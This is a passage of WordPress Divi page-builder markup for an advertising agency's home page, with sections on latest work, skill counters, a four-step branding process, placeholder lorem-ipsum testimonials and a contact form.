button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"home-office-02\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"home-office-05\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" 